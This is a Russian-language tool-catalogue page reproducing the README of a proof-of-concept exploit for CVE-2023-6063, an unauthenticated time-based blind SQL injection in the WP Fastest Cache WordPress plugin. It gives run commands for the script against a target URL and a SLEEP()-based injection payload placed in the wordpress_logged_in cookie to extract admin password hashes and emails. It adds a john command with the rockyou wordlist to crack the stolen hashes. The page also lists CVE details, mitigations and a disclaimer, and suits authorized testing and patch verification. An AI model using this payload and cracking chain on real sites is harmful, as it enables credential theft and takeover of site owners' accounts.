Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-6063-PoC — Доказательство концепции для CVE-2023-6063, уязвимость временной слепой SQL-инъекции в WP Fastest Cache ≤1.2.2. | Kitploit
Инструменты/GitHubGitHub/incommatose/cve-2023-6063-poc
Взлом паролейАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubincommatose/cve-2023-6063-poc

CVE-2023-6063-PoC

Доказательство концепции для CVE-2023-6063, уязвимость временной слепой SQL-инъекции в WP Fastest Cache ≤1.2.2.

Репозиторий
211 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PoC для CVE-2023-6063: WP Fastest Cache 1.2.2 Неаутентифицированная слепая SQL-инъекция

Static Badge Static Badge Static Badge

Proof of Concept для CVE-2023-6063, уязвимости слепой SQL-инъекции на основе времени в WP Fastest Cache ≤1.2.2. Извлекает хэшированные пароли (user_pass) и email-адреса (user_email) из таблицы wp_users, злоупотребляя cookie wordpress_logged_in.

Возможности

  • Извлечение данных на основе времени (посимвольно) через задержки SLEEP().
  • Поддерживает пользовательские cookie, имена пользователей и проверку хэша.

Этот скрипт извлекает:

  • ☑️ Хэши паролей WordPress (MD5/PHPass).
  • ☑️ Связанные email-адреса.
  • Аргументы командной строки для гибкого тестирования (--just-hash, --just-email, --debug).

Использование

Установите зависимости (если не установлены):

root@kitploit:~
pip install -r requirements.txt

Базовое использование:

root@kitploit:~
python3 poc.py -u https://vulnerable-website.com --username admin --delay 5

Полный список опций:

root@kitploit:~
  -h, --help            показать это справочное сообщение и выйти
  -u URL, --url URL     Полный URL WordPress для тестирования CVE-2023-6063
  --username USERNAME   Определить пользователя для извлечения его хэшированного пароля
  -d DELAY, --delay DELAY
                        Время ожидания ответа веб-сервера, по умолчанию 5, минимум 2
  -H HASH, --hash HASH  Хэш для проверки в таблице wp_users, если хэш содержит специальные символы, используйте одинарные кавычки -> '<hash>'
  --domain DOMAIN       Имя домена для проверки email
  -c COOKIE, --cookie COOKIE
                        Укажите имя cookie, если оно отличается в вашем контексте
  --status-code STATUS_CODE
                        Использовать конкретный положительный статус-код, по умолчанию 200
  --debug               Более подробный вывод
  --just-hash           Извлекать только хэшированный пароль
  --just-email          Извлекать только email для пользователя

💻 Демонстрация

Это демонстрация для пользователя admin

https://github.com/user-attachments/assets/21ea643d-3b11-401f-813f-b85abdb05890

Когда хэши паролей утекают, используйте john или hashcat для их расшифровки с помощью алгоритма PHPass, если пароль уязвим.

Пример с John:

root@kitploit:~
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass

🕵️‍♂️ Технические детали

📖 Описание уязвимости

Плагин WP Fastest Cache (≤1.2.2) для WordPress уязвим к неаутентифицированной слепой SQL-инъекции через cookie wordpress_logged_in. Злоумышленники могут использовать этот недостаток для извлечения конфиденциальных данных (например, хэшей паролей, email-адресов) из таблицы wp_users, используя задержки на основе времени (SLEEP()) в SQL-запросах.

root@kitploit:~
" AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") LIKE 'a%', SLEEP(5), 0))-- -

🚨 Отказ от ответственности: Используйте эту информацию только для этичного тестирования безопасности с соответствующим разрешением. Несанкционированная эксплуатация незаконна.

  • CVE ID: CVE-2023-6063
  • Оценка уязвимости: 7.5 (Высокая)
  • Тип уязвимости: SQL-инъекция (слепая, на основе времени)
  • Затронутое ПО: WP Fastest Cache (плагин WordPress) ≤ v1.2.2

🔍 Вектор атаки

  • Эксплуатируемость: Удаленная (аутентификация не требуется)
  • Сложность атаки: Низкая (эксплуатируется через специально сформированные HTTP-запросы)

🔥 Влияние:

  • Конфиденциальность: Высокая (утечка учетных данных администратора)
  • Целостность: Нет
  • Доступность: Нет

📌 Затронутые версии

  • WP Fastest Cache versions ≤1.2.2

🛡️ Меры по смягчению

  • Обновите WP Fastest Cache до версии >1.2.2.
  • Обновите WP Fastest Cache до версии v1.2.3 или новее.
  • Примените правила WAF для блокировки полезных нагрузок SQLi в cookie.
  • Отключите плагин, если он не используется.

📚 Ссылки

  • Запись NIST NVD
  • Уведомление о плагине WordPress
  • Детали CVE

⚖️ Правовая информация

  • Этот скрипт предназначен только для образовательных целей. Всегда получайте явное разрешение перед тестированием.
Скачать инструмент